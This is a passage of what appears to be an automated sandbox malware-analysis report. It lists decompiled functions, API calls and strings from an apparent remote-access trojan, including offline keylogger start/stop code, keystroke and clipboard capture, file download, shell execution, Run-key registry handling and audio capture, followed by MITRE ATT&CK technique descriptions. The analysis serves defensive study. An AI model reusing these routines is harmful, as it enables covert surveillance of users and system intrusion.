					_push(_v24.wMilliseconds & 0x0000ffff);
					_push(_v24.wSecond & 0x0000ffff);
					_push(_v24.wMinute & 0x0000ffff);
					E1059569C(_t91, E10592E03(E105961B1(0x45f5ec,  &_v72, E10592EF2(0x45f5ec,  &_v48, 0x45f5ec), __edi, _t91, 0x45f608)), _v24.wHour & 0x0000ffff);
					_t86 = _t86 + 0x2c;
					E10592E35();
					E10592E35();
					 *0x46c7e4 = 0;
				}
				if( *0x46c7dc != _t85) {
					_t93 =  *0x46c7e5;
					if( *0x46c7e5 != 0) {
						GetLocalTime( &_v24);
						_push(_t85);
						_push(_v24.wMilliseconds & 0x0000ffff);
						_push(_v24.wSecond & 0x0000ffff);
						_push(_v24.wMinute & 0x0000ffff);
						E1059569C(_t93, E10592E03(E105961B1(0x45f5ec,  &_v72, E10592EF2(0x45f5ec,  &_v48, 0x45f5ec), _t84, _t93, 0x45f62c)), _v24.wHour & 0x0000ffff);
						E10592E35();
						E10592E35();
					}
				}
				goto L7;
			}

0x10595e1b
0x10595e2a
0x10595f7f
0x00000000
0x10595f7f
0x10595e37
0x10595e3a
0x10595f67
0x10595f67
0x10595f70
0x10595f77
0x00000000
0x10595f77
0x10595e40
0x10595e4c
0x10595e56
0x10595e63
0x10595e68
0x10595e6d
0x10595e91
0x10595e9c
0x10595ea4
0x10595eb0
0x10595eb1
0x10595eb6
0x10595ebb
0x10595edf
0x10595ee4
0x10595eea
0x10595ef2
0x10595ef7
0x10595ef7
0x10595f04
0x10595f06
0x10595f0d
0x10595f13
0x10595f20
0x10595f21
0x10595f26
0x10595f2b
0x10595f4f
0x10595f5a
0x10595f62
0x10595f62
0x10595f0d
0x00000000

APIs

GetLocalTime.KERNEL32(?), ref: 10595E56
GetLocalTime.KERNEL32(?), ref: 10595F13

Strings

%02i:%02i:%02i:%03i [Info] , xrefs: 10595E47, 10595E78, 10595EC6, 10595F36

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: LocalTime
String ID: %02i:%02i:%02i:%03i [Info]
API String ID: 481472006-1582603680
Opcode ID: c002146ff835f1101febd2b3f3f9689e7bbfa51cf604b73ba2f29748fc1e801f
Instruction ID: c658bcdfb133b95ab966972e778edcba56b15d1dacd2939b8252fe4f6b52d582
Opcode Fuzzy Hash: c002146ff835f1101febd2b3f3f9689e7bbfa51cf604b73ba2f29748fc1e801f
Instruction Fuzzy Hash: 0F41B5B6C00148AACB00DBB4DC89AFEBBBCDB5C346F504066F841E6191FB386A49D765

Uniqueness

Uniqueness Score: -1.00%

Function 0040414D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404167

Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA

Part of subcall function 0041432B: CloseHandle.KERNEL32( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
Part of subcall function 0041432B: CloseHandle.KERNEL32(?), ref: 0041434A

Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9

Sleep.KERNEL32(000000FA,0045F464), ref: 00404239

Strings

/sort "Visit Time" /stext ", xrefs: 004041B3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: 180c380c2922e39affd1277b0cb4d4a90a6e5fdee3d97fa11ebe90aea9bbed14
Instruction ID: 7061a5f3a0732a34bedf69b2f97f4882e16be89ee39d0e7819724232ed9fbdaa
Opcode Fuzzy Hash: 180c380c2922e39affd1277b0cb4d4a90a6e5fdee3d97fa11ebe90aea9bbed14
Instruction Fuzzy Hash: CB316371A102185BCB14FAB5DC969EE77769F90308F40007FB906775E2EF38194ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 00409C15, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0042F49E: __onexit.LIBCMT ref: 0042F4A4

__Init_thread_footer.LIBCMT ref: 00409C64

Strings

[End of clipboard], xrefs: 00409CA6
[Text copied to clipboard], xrefs: 00409CB3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: ece6e36ffa962d19449e2b0787c4a54564b40f9831cee9b3f8d6904f1f792cc1
Instruction ID: 3d06db49f43303a05e4c8f32813a3e66390e02e7d5a4e21382efde84428f3d7c
Opcode Fuzzy Hash: ece6e36ffa962d19449e2b0787c4a54564b40f9831cee9b3f8d6904f1f792cc1
Instruction Fuzzy Hash: 6621A231A101088ACB14FBA5D9929EEB379AF54314F50017FF902771D3EF386D4A869D

Uniqueness

Uniqueness Score: -1.00%

Function 00449DB7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044A012,?,00000050,?,?,?,?,?), ref: 00449E92

Strings

ACP, xrefs: 00449DD5
OCP, xrefs: 00449E0B

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 83047d10c1cb2af2f865f0400f74a2dfdf605a72ce1efc873ea23dd6a869fcf3
Instruction ID: 629df3418df93450f9fa2fa803e099c9df1f2dc0fc1cc2c13268e355a6833585
Opcode Fuzzy Hash: 83047d10c1cb2af2f865f0400f74a2dfdf605a72ce1efc873ea23dd6a869fcf3
Instruction Fuzzy Hash: D421FB63A00100A6FB34CF65C901B9773AADB64B51F76442AE909D7385EB3ADD01E358

Uniqueness

Uniqueness Score: -1.00%

Function 00412A86, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 00412A88
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 00412AEA

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: 8E@
API String ID: 1931167962-787191786
Opcode ID: 3410a5c9f82c25c8ba3a4d0fdb73f71bcee90e7852e91e14cb60bb03a2b14178
Instruction ID: 026e37eaac6a7f0be5a6f47ff2f6c220693f67fdfc1424ac955b23e6f862d316
Opcode Fuzzy Hash: 3410a5c9f82c25c8ba3a4d0fdb73f71bcee90e7852e91e14cb60bb03a2b14178
Instruction Fuzzy Hash: 661186715043015BD614FF72D8569BF7399AF54309F00083FF946A61E2EF389948C65A

Uniqueness

Uniqueness Score: -1.00%

Function 1059A417, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E1059A417(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t27;
				void* _t28;

				_t17 = __ebx;
				_t27 = __ecx;
				if( *((char*)(__ecx + 0x49)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t33 =  *0x46a9d4 - 0x32;
				if( *0x46a9d4 != 0x32) {
					E10592EF2(__ebx,  &_v28, 0x45fa10);
					_t28 = _t28 - 0x18;
					E105A8148(_t28,  &_v28);
					E1059A4A2(__ebx, _t27, _t33);
					E10592E35();
				}
				_t29 = _t28 - 0x18;
				E10592EF2(_t17, _t28 - 0x18, 0x45fa10);
				E10592EF2(_t17, _t29 - 0x18, "[Info]");
				E105A7AEE(_t17, 0x45fa10);
				_t27[0x12] = 0;
				if(_t27[0x12] == 0 &&  *_t27 != 0) {
					UnhookWindowsHookEx( *_t27);
					 *_t27 =  *_t27 & 0x00000000;
				}
				return 1;
			}

0x1059a417
0x1059a41e
0x1059a425
0x1059a49a
0x00000000
0x1059a49a
0x1059a427
0x1059a433
0x1059a439
0x1059a43e
0x1059a446
0x1059a44d
0x1059a455
0x1059a455
0x1059a45a
0x1059a460
0x1059a46f
0x1059a474
0x1059a47c
0x1059a484
0x1059a48d
0x1059a493
0x1059a493
0x00000000

APIs

UnhookWindowsHookEx.USER32(?), ref: 1059A48D

Part of subcall function 1059A4A2: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 1059A4B0
Part of subcall function 1059A4A2: wsprintfW.USER32 ref: 1059A531
Part of subcall function 1059A4A2: SetEvent.KERNEL32(00000000,00000000), ref: 1059A55B

Strings

Offline Keylogger Stopped, xrefs: 1059A42E, 1059A435, 1059A45F
[Info], xrefs: 1059A46A

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: EventHookLocalTimeUnhookWindowswsprintf
String ID: Offline Keylogger Stopped$[Info]
API String ID: 2949427887-1791908007
Opcode ID: a4d57ab4f8787b26c13e567e1f848d4a2bb0d4328440e5da0fea6a2577d30637
Instruction ID: d53c78ef6e602ee70b3b2dbbd6e94c13c1eee6887f05367a8067b2bf3f7140c0
Opcode Fuzzy Hash: a4d57ab4f8787b26c13e567e1f848d4a2bb0d4328440e5da0fea6a2577d30637
Instruction Fuzzy Hash: 3D01FC35A0421056DF227734CC0F7BE7FA5DBD2291F40045DD846121D2DBE519AAD7E3

Uniqueness

Uniqueness Score: -1.00%

Function 004095A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(?), ref: 0040961F

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Strings

[Info], xrefs: 004095FC
Offline Keylogger Stopped, xrefs: 004095C0, 004095C7, 004095F1

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EventHookLocalTimeUnhookWindowswsprintf
String ID: Offline Keylogger Stopped$[Info]
API String ID: 2949427887-1791908007
Opcode ID: 401e296d5ca654c2970b2b3bb8dcd657e39c2b4926fc386e29e92b6c915f74fd
Instruction ID: 9efaed4a8ef81a290ad5d268e4fe3922035fbc03e5cccf55ce25ae16395c1a9d
Opcode Fuzzy Hash: 401e296d5ca654c2970b2b3bb8dcd657e39c2b4926fc386e29e92b6c915f74fd
Instruction Fuzzy Hash: 0D01B531A0460157DB297729D80B7BE7BA54B42305F44057FD981222D3EABE0D5AC7DF

Uniqueness

Uniqueness Score: -1.00%

Function 004425B3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,?C,00000000,00000001,?,?,0043E33F,?,?,0043DD1F,?,00000004), ref: 004425FF

Strings

IsValidLocaleName, xrefs: 004425C4, 004425CE
?C, xrefs: 004425F6, 004425E3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocaleValid
String ID: ?C$IsValidLocaleName
API String ID: 1901932003-3626571907
Opcode ID: d1d8c5253a1af981cfd3e37de039cb3b4bc27b4a035ec99b902d66c65b304dd4
Instruction ID: 0f43182f0e06842afc615407eccca0477f3e303412cdda621fdba0a01c3862c5
Opcode Fuzzy Hash: d1d8c5253a1af981cfd3e37de039cb3b4bc27b4a035ec99b902d66c65b304dd4
Instruction Fuzzy Hash: 92F05230680718B7DB216F209C02FAEBB64DB04B52F90402BFC016B2C2DEBD5E05958D

Uniqueness

Uniqueness Score: -1.00%

Function 00409B11, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 00409B16

Part of subcall function 004089BA: GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089EE
Part of subcall function 004089BA: GetWindowThreadProcessId.USER32(00000000,?), ref: 004089F9
Part of subcall function 004089BA: GetKeyboardLayout.USER32(00000000), ref: 00408A00
Part of subcall function 004089BA: GetKeyState.USER32(00000010), ref: 00408A0A
Part of subcall function 004089BA: GetKeyboardState.USER32(?), ref: 00408A17
Part of subcall function 004089BA: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A33

Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD

Strings

[AltL], xrefs: 00409B58
[AltR], xrefs: 00409B4C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: 233eeff81a11d1e0ef41f110e07776e11a9ad604124f7dffc3698ee59377735f
Instruction ID: 2a395f7e7ec9595130e68cde229813fbdc3430fa116e23059516ea087cae5920
Opcode Fuzzy Hash: 233eeff81a11d1e0ef41f110e07776e11a9ad604124f7dffc3698ee59377735f
Instruction Fuzzy Hash: 57E0652130062197C858363E7A2B76E3C219B827B5B40016FF9866B6C7DD7EAD4543CF

Uniqueness

Uniqueness Score: -1.00%

Function 00412777, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00412795

Strings

open, xrefs: 0041278F
8E@, xrefs: 004133C4

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExecuteShell
String ID: 8E@$open
API String ID: 587946157-2601783919
Opcode ID: 4a174233fad1308712026915405e2748d4c3bbd23a7c6193313af7554f161b63
Instruction ID: a3a45966c527cb9039505bdf36bed85c4dc8a7f97c1c46fe52c99c9ff6feb995
Opcode Fuzzy Hash: 4a174233fad1308712026915405e2748d4c3bbd23a7c6193313af7554f161b63
Instruction Fuzzy Hash: 86E092712083445BD204FA72DC81EBFB398AB50309F00083FB906A10E2EF385D0C866A

Uniqueness

Uniqueness Score: -1.00%

Function 00409B6B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 00409B70

Strings

[CtrlR], xrefs: 00409B8D
[CtrlL], xrefs: 00409B9E

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 64742ad456815e448cec770cc028005fb44021ec5766c216196dc85abf317472
Instruction ID: c7d76ad8b2f91347b64eca3d28aa0764e40cca804d3340b3ca60eca204a5aa27
Opcode Fuzzy Hash: 64742ad456815e448cec770cc028005fb44021ec5766c216196dc85abf317472
Instruction Fuzzy Hash: 61E048212102115BC514353AA61A67939209741775B40013FE982AB5C7C96F6D1542CB

Uniqueness

Uniqueness Score: -1.00%

Function 00410D5C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,0046C500,80000002,?,0040AE30,00000000,?,0046C518,0046C500), ref: 00410D6A
RegDeleteValueW.ADVAPI32(0046C500,0046C518,?,0040AE30,00000000,?,0046C518,0046C500), ref: 00410D7E

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00410D68

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 4fad1368e3560850efc42bff900c7ba9b40029ea3229a6a7c2dc80faaaf5e034
Instruction ID: 75ebaf3219d9d67017fe3971026eac3f4578a9a4a068ccc2e26b180b3f179870
Opcode Fuzzy Hash: 4fad1368e3560850efc42bff900c7ba9b40029ea3229a6a7c2dc80faaaf5e034
Instruction Fuzzy Hash: D1E0C231284308BBEF104FB1EC07FFA772CEB01F42F1002A5B90692091C666DB549664

Uniqueness

Uniqueness Score: -1.00%

Function 004129DA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

waveInStop.WINMM ref: 004129E6
waveInClose.WINMM ref: 004129F2

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: wave$CloseStop
String ID: 8E@
API String ID: 3638528417-787191786
Opcode ID: 1d3af16e672de4a25f439eee544860deda97f69f123fda986720eb11b6d204bc
Instruction ID: 5a6495d9c5bf32114adb3f6aa644e01b82198ca3e6267900558c7952ddd75583
Opcode Fuzzy Hash: 1d3af16e672de4a25f439eee544860deda97f69f123fda986720eb11b6d204bc
Instruction Fuzzy Hash: CAE04F311182818BC311EF65E80569DB790FB51306F40053EE455D10F2EF354599DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 105CBA26, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E105CBA26(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E105C6375(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E105CB372())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E105CB372())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E105D5424(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E105CB372())) = 0x16;
					return E105C77CB() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x105cba26
0x105cba2f
0x105cba34
0x105cba37
0x105cba3b
0x105cba4a
0x105cba4d
0x105cba6d
0x105cba72
0x105cba75
0x105cba77
0x105cbb45
0x105cbb4b
0x105cbb60
0x105cbb6c
0x105cbb72
0x105cbb74
0x105cbb83
0x105cbb83
0x105cbb83
0x105cbb86
0x105cbb86
0x105cbb8a
0x105cbb8c
0x105cbb8f
0x105cbb8f
0x105cbb8f
0x105cbb8f
0x00000000
0x105cbb96
0x105cbb7b
0x00000000
0x105cbb7b
0x105cbb4d
0x105cbb50
0x105cbb53
0x105cbb53
0x105cbb55
0x105cbb56
0x105cbb56
0x105cbb5a
0x00000000
0x105cbb5a
0x105cba7d
0x105cba83
0x105cbab0
0x105cbabc
0x105cbac2
0x105cbac4
0x00000000
0x00000000
0x105cbaca
0x105cbad0
0x105cbad3
0x105cbb2f
0x105cbb34
0x105cbb3c
0x00000000
0x105cbb3c
0x105cbad5
0x105cbad8
0x105cbada
0x105cbadd
0x105cbadf
0x105cbae1
0x105cbb17
0x105cbb25
0x105cbb2b
0x105cbb2d
0x105cbb41
0x00000000
0x105cbb41
0x00000000
0x00000000
0x00000000
0x00000000
0x105cbae3
0x105cbae3
0x105cbae3
0x105cbae6
0x105cbae9
0x105cbaeb
0x00000000
0x00000000
0x105cbaf5
0x105cbafc
0x105cbaff
0x105cbb01
0x105cbb09
0x105cbb09
0x105cbb0c
0x105cbb0d
0x105cbb10
0x105cbb12
0x00000000
0x00000000
0x00000000
0x105cbb12
0x105cbb03
0x105cbb04
0x105cbb07
0x00000000
0x00000000
0x00000000
0x105cbb07
0x105cbb14
0x00000000
0x105cbb14
0x105cba85
0x105cba87
0x00000000
0x00000000
0x105cba8d
0x105cba90
0x105cba94
0x105cba97
0x105cba9b
0x00000000
0x00000000
0x105cbaa1
0x105cbaa2
0x105cbaa5
0x105cbaa7
0x00000000
0x00000000
0x00000000
0x105cbaa9
0x00000000
0x105cba90
0x105cba54
0x00000000
0x105cba5f
0x105cba41
0x105cba47
0x00000000
0x105cba47
0x105cbb9e

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,10592BA7), ref: 105CBABC
GetLastError.KERNEL32 ref: 105CBACA
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 105CBB25

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 21022116bf5d6837b0bebcf78aae5f7d6e319b716b600fd8393b396d21651974
Instruction ID: 9fb9b540b6f1ce034e46531ce066487a0c93ef7d82f69d90f01d48d26c20634f
Opcode Fuzzy Hash: 21022116bf5d6837b0bebcf78aae5f7d6e319b716b600fd8393b396d21651974
Instruction Fuzzy Hash: 0E41E534A00247AFEB118FE4CE44B6A7FBDEF427A4F114168F8595B1A4DB319D01EB51

Uniqueness

Uniqueness Score: -1.00%

Function 0043ABB8, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D39), ref: 0043AC4E
GetLastError.KERNEL32 ref: 0043AC5C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043ACB7

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 423051db126c3a8df266828a14b55dd6d99f893ebfa07b077aa324b5e129a5cf
Instruction ID: 194ea371ff84ff86851054fe8b49944eeea2ba512111cdfb336a3f9b4c52f9a6
Opcode Fuzzy Hash: 423051db126c3a8df266828a14b55dd6d99f893ebfa07b077aa324b5e129a5cf
Instruction Fuzzy Hash: DC412930640246AFCF21CF65C844A7F7BA5EF09312F24616AF9955B391D7388D21C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4FE, Relevance: 5.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F89B), ref: 0040F52C
IsBadReadPtr.KERNEL32(?,00000014,?,0040F89B), ref: 0040F5FE
SetLastError.KERNEL32(0000007F), ref: 0040F619
SetLastError.KERNEL32(0000007E,?,0040F89B), ref: 0040F632

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: c7e9688620f9bae9d1880f1a6b981ae3ed74a0f78203f15c523f219ad1b5e301
Instruction ID: 276675e80245dda8867d672efd476c996cb1fc0ae7fab6a88f5e1639ff5a30e1
Opcode Fuzzy Hash: c7e9688620f9bae9d1880f1a6b981ae3ed74a0f78203f15c523f219ad1b5e301
Instruction Fuzzy Hash: B3419B71A00204EFDB24CF58CC44B6AB7F5FF44711F14887AE446A7A91E739E906DB18

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

